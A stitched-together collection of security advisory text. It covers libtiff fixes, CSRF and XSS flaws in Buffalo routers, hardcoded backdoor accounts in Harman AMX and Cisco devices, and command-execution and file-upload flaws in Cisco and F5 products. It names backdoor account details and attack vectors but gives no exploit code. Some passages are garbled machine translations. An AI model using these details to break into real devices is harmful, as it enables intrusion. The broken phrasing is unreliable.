http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5320 [ 42 ] CVE-2016-5321 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5321 [ 43 ] CVE-2016-5322 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5322 [ 44 ] CVE-2016-5323 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5323 [ 45 ] CVE-2016-5652 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5652 [ 46 ] CVE-2016-5875 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5875 [ 47 ] CVE-2016-6223 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6223 [ 48 ] CVE-2016-8331 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-8331 [ 49 ] CVE-2016-9273 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9273 [ 50 ] CVE-2016-9297 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9297 [ 51 ] CVE-2016-9318 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9318 [ 52 ] CVE-2016-9448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9448 [ 53 ] CVE-2016-9453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9453 [ 54 ] CVE-2016-9532 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9532 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201701-16 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2017 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 --WUa5dgL7FmU1aSF31hCrUKc2JiSevbqka-- . Multiple out-of-bounds read and write flaws could cause an application using the tiff library to crash. For the oldstable distribution (wheezy), these problems have been fixed in version 4.0.2-6+deb7u5. For the stable distribution (jessie), these problems have been fixed in version 4.0.3-12.3+deb8u1. For the testing distribution (stretch), these problems have been fixed in version 4.0.6-1. For the unstable distribution (sid), these problems have been fixed in version 4.0.6-1. We recommend that you upgrade your tiff packages. 6) - i386, x86_64 3

Cross-site request forgery (CSRF) vulnerability on BUFFALO BHR-4GRV2 devices with firmware 1.04 and earlier, WEX-300 devices with firmware 1.90 and earlier, WHR-1166DHP devices with firmware 1.90 and earlier, WHR-300HP2 devices with firmware 1.90 and earlier, WHR-600D devices with firmware 1.90 and earlier, WMR-300 devices with firmware 1.90 and earlier, WMR-433 devices with firmware 1.01 and earlier, and WSR-1166DHP devices with firmware 1.01 and earlier allows remote attackers to hijack the authentication of arbitrary users. Multiple network devices provided by BUFFALO INC. contain a cross-site request forgery vulnerability (CWE-352). Satoshi Ogawa of Mitsui Bussan Secure Directions, Inc. and Masashi Sakai reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.If a user views a malicious page while logged in, unintended operations may be conducted. Buffalo BHR-4GRV2 and so on are all wireless router products of Buffalo Group of Japan. A remote attacker could exploit this vulnerability to perform unauthorized operations. This may aid in other attacks. Buffalo BHR-4GRV2 etc

Cross-site scripting (XSS) vulnerability on BUFFALO BHR-4GRV2 devices with firmware 1.04 and earlier, WEX-300 devices with firmware 1.90 and earlier, WHR-1166DHP devices with firmware 1.90 and earlier, WHR-300HP2 devices with firmware 1.90 and earlier, WHR-600D devices with firmware 1.90 and earlier, WMR-300 devices with firmware 1.90 and earlier, WMR-433 devices with firmware 1.01 and earlier, and WSR-1166DHP devices with firmware 1.01 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. Multiple network devices provided by BUFFALO INC. contain a cross-site scripting vulnerability. Satoshi Ogawa of Mitsui Bussan Secure Directions, Inc. reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.An arbitrary script may be executed on the logged in user's web browser. Buffalo is the wireless router product of the Buffalo Group. A remote attacker can exploit this vulnerability to inject arbitrary web scripts or HTML. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Buffalo BHR-4GRV2 etc

The setUpSubtleUserAccount function in /bin/bw on Harman AMX devices before 2015-10-12 has a hardcoded password for the BlackWidow account, which makes it easier for remote attackers to obtain access via a (1) SSH or (2) HTTP session, a different vulnerability than CVE-2016-1984. Multiple models of Harman AMX multimedia devices contain a hard-coded debug account. plural Harman AMX There is an issue with the product where the account for debugging is hard coded. Problems with hard-coded credentials (CWE-798) - CVE-2015-8362 According to the discoverer's blog post, AMX Multiple models in the series have hardcoded administrative rights accounts (" back door ") Exists. Check the vulnerability advisory for discoverers for more information. AMX The release notes for stated that this was a debugging account. CWE-798: Use of Hard-coded Credentials http://cwe.mitre.org/data/definitions/798.html Blog post http://blog.sec-consult.com/2016/01/deliberately-hidden-backdoor-account-in.html Vulnerability advisory https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20160121-0_AMX_Deliberately_hidden_backdoor_account_v10.txt AMX Release notes http://www.amx.com/techcenter/firmware.asp?Category=Hot%20Fix%20FilesAn attacker who knows the authentication information may gain access to the device with administrator privileges. HarmanAMX is a series of conversion controller products from Harman Corporation of the United States. A security vulnerability exists in the \342\200\230setUpSubtleUserAccount\342\200\231 function in /bin/bwURI prior to HarmanAMX 2015-10-12, which was derived from a hard-coded password on a BlackWidow account. Multiple AMX Products are prone to a security-bypass vulnerability

The setUpSubtleUserAccount function in /bin/bw on Harman AMX devices before 2016-01-20 has a hardcoded password for the 1MB@tMaN account, which makes it easier for remote attackers to obtain access via a (1) SSH or (2) HTTP session, a different vulnerability than CVE-2015-8362. HarmanAMX is a series of conversion controller products from Harman Corporation of the United States

Cisco Modular Encoding Platform D9036 Software before 02.04.70 has hardcoded (1) root and (2) guest passwords, which makes it easier for remote attackers to obtain access via an SSH session, aka Bug ID CSCut88070. Vendors have confirmed this vulnerability Bug ID CSCut88070 It is released as.By a third party SSH Access may be gained through a session. Remote attackers with knowledge of the default credentials may exploit this vulnerability to gain unauthorized access and perform unauthorized actions. This may aid in further attacks. This issue being tracked by Cisco Bug ID CSCut88070

An unspecified CGI script in Cisco FX-OS before 1.1.2 on Firepower 9000 devices and Cisco Unified Computing System (UCS) Manager before 2.2(4b), 2.2(5) before 2.2(5a), and 3.0 before 3.0(2e) allows remote attackers to execute arbitrary shell commands via a crafted HTTP request, aka Bug ID CSCur90888. Vendors have confirmed this vulnerability Bug ID CSCur90888 It is released as.Skillfully crafted by a third party HTTP Any via request shell The command may be executed. Cisco Unified Computing System Manager and Cisco FX-OSon Firepower 9000 are products of Cisco. The former is a set of embedded device management software that manages the Cisco Unified Computing System from a single, highly available logical entity, end-to-end, an operating system running on the 9000 Series firewall devices. There are security vulnerabilities in CGI scripts in CiscoUCSManager and FX-OSforFirepower 9000Series. Multiple Cisco products are prone to a remote command-execution vulnerability. This may aid in further attacks. This issue being tracked by Cisco Bug IDs CSCur90888 and CSCux10615. The following products and versions are affected: Cisco UCS Manager prior to 2.2(4b), 2.2(5) prior to 2.2(5a), 3.0 prior to 3.0(2e), FX-OS for Firepower 9000 Series prior to 1.1.2

Incomplete blacklist vulnerability in the Configuration utility in F5 BIG-IP LTM, Analytics, APM, ASM, GTM, Link Controller, and PSM 11.x before 11.2.1 HF11, 11.3.x, 11.4.0 before HF8, and 11.4.1 before HF6; BIG-IP AAM 11.4.0 before HF8 and 11.4.1 before HF6; BIG-IP AFM and PEM 11.3.x, 11.4.0 before HF8, and 11.4.1 before HF6; and BIG-IP Edge Gateway, WebAccelerator, and WOM 11.x before 11.2.1 HF11 and 11.3.0 allows remote authenticated users to upload files via uploadImage.php. plural F5 BIG-IP Product Configuration The utility contains a vulnerability where files are uploaded due to an incomplete blacklist. Supplementary information : CWE Vulnerability type by CWE-284: Improper Access Control ( Inappropriate access control ) Has been identified. http://cwe.mitre.org/data/definitions/284.htmlBy a remotely authenticated user uploadImage.php The file may be uploaded via. Multiple F5 BIG-IP products are prone to an arbitrary file-upload vulnerability. An attacker may leverage this issue to upload arbitrary files to the affected webserver; this can result in arbitrary code execution within the context of the vulnerable application. F5 BIG-IP LTM, etc. are all products of F5 Company in the United States. LTM is a local traffic manager; APM is a solution that provides secure unified access to business-critical applications and networks